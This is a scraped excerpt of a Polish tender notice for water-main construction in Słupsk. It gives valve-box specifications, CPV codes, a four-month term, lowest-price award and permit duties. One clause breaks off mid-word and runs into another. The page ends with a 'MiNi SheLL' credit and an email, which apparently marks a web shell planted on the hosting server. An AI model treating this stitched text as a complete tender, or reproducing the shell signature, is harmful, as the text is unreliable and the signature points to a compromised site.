Wykonawca ponosi wszystkie koszty niezbędne do należytego wykonania zamówienia, z uwzględnieniem wszelkich opłat, a w szczególności związanych z obsługą geodezyjną, geologiczną, projektu organizacji ruchu drogowego na czas prowadzenia robót, opłat za zajęcie pasów drogowych, ewentualnego odwodnienia i szalowania wykopów, koszty przywrócenia do poprzedniego stanu użyteczności pasów drogowych, itp.
a) koniec przedłużenia trzpienia (teleskopowy) zasuwy powinien znajdować się na głębokości ok. 15-25cm od powierzchni terenu i być wyprowadzony do skrzynki ulicznej,
b) skrzynkę uliczną do zasuw projektować z żeliwa lub z PEHD o wysokości min. 270mm z pokrywą żeliwną o wymiarach o średnicy min. 150mm,
c) w przypadku lokalizacji skrzynki w terenie nieutwardzonym, teren wokół skrzynki należy umocnić w promieniu min. 0,25m licząc od trzpienia.

Wszystkie materiały użyte do realizacji sieci winny być przedstawione do akceptacji przez Zamawiającego przed wbudowaniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.21.50-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2 - Budowa sieci wodociągowej rozdzielczej w ul. Jodłowej i ul. Jałowcowej 
w  Słupsku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia określa szczegółowo Projekt Budowlany  [PB] sieci wodociągowej Jodłowa- sięgacze - budowa sieci wodociągowej rozdzielczej - ul. Jodłowa (dz. 752/15) i ul. Jałowcowa (dz. 1033/17) w Słupsku; opracowany przez inż. Jakuba Sieciechowicza. Opracowanie: styczeń 2014 r. wraz z Decyzją Prezydenta Miasta Słupska nr 233/2014 o pozwoleniu na budowę sieci wodociągowej rozdzielczej w ulicy Jodłowej i Jałowcowej w Słupsku.
Przedmiotem inwestycji jest budowa sieci wodociągowej  o średnicy De110mm (L= 549,8 m) w sięgaczach od ul. Jodłowej (dz. 752/15) i od ul. Jałowcowej (dz. 1033/17) wraz z połączeniami z istniejącą siecią wodociągową w ul. Jodłowej w Słupsku i wykonaniem przełączenia istniejących przyłączy wodociągowych o średnicy De40 na odcinkach zaprojektowanej sieci (o łącznej długości 98,60 m).
Wszystkie materiały użyte do realizacji sieci winny być przedstawione do akceptacji przez Zamawiającego przed wbudowani
4.3. Przedmiot umowy obejmuje ponadto przeprowadzenie w imieniu Zamawiającego, na podstawie udzielonego przez Zamawiającego pełnomocnictwa, procedury uzyskania prawomocnych decyzji administracyjnych w sprawie umieszczenia urządzeń w pasie drogowym oraz zajęcia pasa drogowego, w związku z wykonaniem robót objętych przedmiotem umowy, wydanych na podstawie art. 39 ust. 3 i 3a oraz art. 40 ust. 1 ustawy z dnia 21.03.1985 r. o drogach publicznych. Wykonawca zobowiązany jest do bezzwłocznego dostarczenia Zamawiającemu decyzji, o których mowa powyżej, jak również bezzwłoczne zgłoszenie Zamawiającemu zastrzeżeń do tych decyzji oraz współdziałanie z Zamawiającym w wypadku konieczności odwołania się od tych decyzji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.21.50-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com